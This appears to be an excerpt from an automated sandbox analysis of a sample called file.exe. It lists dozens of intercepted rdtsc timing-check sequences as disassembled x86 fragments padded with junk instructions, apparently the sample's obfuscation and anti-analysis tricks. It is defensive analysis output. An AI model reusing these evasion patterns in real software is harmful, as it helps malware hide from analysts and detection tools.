                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C58D4 second address: 13C5929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jg 00007F11F8F18C42h 0x00000011 jbe 00007F11F8F18C3Ch 0x00000017 jmp 00007F11F8F18C36h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F11F8F18C38h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5929 second address: 13C5945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8D51848h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C59AF second address: 13C59B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C59B3 second address: 13C59D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11F8D51849h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C59D6 second address: 13C5A79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F11F8F18C28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 call 00007F11F8F18C29h 0x0000002b push ecx 0x0000002c jmp 00007F11F8F18C2Dh 0x00000031 pop ecx 0x00000032 push eax 0x00000033 jmp 00007F11F8F18C36h 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d jmp 00007F11F8F18C2Ch 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 jl 00007F11F8F18C26h 0x0000004b popad 0x0000004c popad 0x0000004d mov eax, dword ptr [eax] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 jmp 00007F11F8F18C39h 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5A79 second address: 13C5A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11F8D5183Ah 0x00000008 jmp 00007F11F8D5183Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5C53 second address: 13C5C65 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F11F8F18C26h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5C65 second address: 13C5C8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F11F8D51836h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F11F8D51841h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5C8B second address: 13C5CC0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 je 00007F11F8F18C2Ch 0x00000016 jo 00007F11F8F18C26h 0x0000001c jmp 00007F11F8F18C2Dh 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 js 00007F11F8F18C26h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5CC0 second address: 13C5CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5CC4 second address: 13C5D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F11F8F18C2Ch 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F11F8F18C28h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f call 00007F11F8F18C36h 0x00000034 sub ecx, dword ptr [ebp+122D19C9h] 0x0000003a pop edx 0x0000003b lea ebx, dword ptr [ebp+124577D6h] 0x00000041 sbb cl, FFFFFF8Ah 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 jo 00007F11F8F18C26h 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5D38 second address: 13C5D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E20 second address: 13C5E29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E29 second address: 13C5E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E34 second address: 13C5E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F11F8F18C37h 0x0000000b jmp 00007F11F8F18C2Fh 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F11F8F18C36h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E7F second address: 13C5E83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C5E83 second address: 13C5EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F11F8F18C28h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 jmp 00007F11F8F18C2Dh 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D7D2D second address: 13D7D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E76A8 second address: 13E76AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5548 second address: 13E5550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5550 second address: 13E5555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5555 second address: 13E555A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5690 second address: 13E5694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5694 second address: 13E569A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E569A second address: 13E56B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F11F8F18C2Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F11F8F18C26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E59B4 second address: 13E59BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E59BA second address: 13E59BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E59BE second address: 13E59C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5AF2 second address: 13E5AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5C8E second address: 13E5C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5DE6 second address: 13E5DEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5EFB second address: 13E5F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D51843h 0x00000009 pop ebx 0x0000000a jmp 00007F11F8D51845h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6325 second address: 13E632B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E65F1 second address: 13E65F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA3A2 second address: 13DA3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA3A8 second address: 13DA3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADD67 second address: 13ADD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADD6B second address: 13ADD75 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F11F8D5183Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D2B second address: 13E6D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C32h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F11F8F18C2Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D55 second address: 13E6D5F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D51836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D5F second address: 13E6D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F11F8F18C2Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6D76 second address: 13E6D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F11F8D51836h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D51841h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6F27 second address: 13E6F8B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F11F8F18C32h 0x00000010 jne 00007F11F8F18C26h 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F11F8F18C36h 0x0000001d popad 0x0000001e jmp 00007F11F8F18C2Eh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jo 00007F11F8F18C26h 0x0000002d jmp 00007F11F8F18C2Ch 0x00000032 popad 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6F8B second address: 13E6F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6F92 second address: 13E6FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11F8F18C2Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E70E5 second address: 13E7101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F11F8D5183Ch 0x0000000b jbe 00007F11F8D51836h 0x00000011 pop esi 0x00000012 push ecx 0x00000013 pushad 0x00000014 jl 00007F11F8D51836h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7101 second address: 13E7107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB2BB second address: 13EB2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F11F8D51836h 0x0000000c jmp 00007F11F8D51841h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F11F8D51845h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EB2F2 second address: 13EB2FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8DD2 second address: 13A8DD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDA9 second address: 13EEDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C2Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDBA second address: 13EEDC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDC0 second address: 13EEDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F11F8F18C33h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EEDD9 second address: 13EEDE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A4E second address: 13F3A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F11F8F18C26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A58 second address: 13F3A62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A62 second address: 13F3A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C33h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A79 second address: 13F3A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A7D second address: 13F3A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnp 00007F11F8F18C26h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3A8F second address: 13F3AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51846h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F30B7 second address: 13F30CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F11F8F18C2Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F30CC second address: 13F30DA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4F75 second address: 13F4F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F55D5 second address: 13F55ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F11F8D51836h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F55ED second address: 13F5641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F11F8F18C28h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 clc 0x00000028 nop 0x00000029 push ecx 0x0000002a jp 00007F11F8F18C28h 0x00000030 pushad 0x00000031 popad 0x00000032 pop ecx 0x00000033 push eax 0x00000034 pushad 0x00000035 jl 00007F11F8F18C2Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5710 second address: 13F5714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5714 second address: 13F571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F5810 second address: 13F582B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11F8D5183Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F582B second address: 13F5831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6C10 second address: 13F6C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F83D0 second address: 13F83EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8F7F second address: 13F8F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F83EC second address: 13F83F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F91AA second address: 13F922A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007F11F8D51838h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 00000014h 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 jmp 00007F11F8D5183Bh 0x00000025 cld 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F11F8D51838h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 jns 00007F11F8D51847h 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b mov si, cx 0x0000004e pop edi 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 ja 00007F11F8D51838h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8F83 second address: 13F8F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F922A second address: 13F922E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8F87 second address: 13F8F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9CA7 second address: 13F9D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F11F8D51838h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F11F8D51838h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F11F8D51838h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a mov dword ptr [ebp+1246720Eh], ebx 0x00000060 push eax 0x00000061 push esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB97C second address: 13FB980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB980 second address: 13FB999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jmp 00007F11F8D5183Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB999 second address: 13FB99D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA5F1 second address: 13FA5FB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
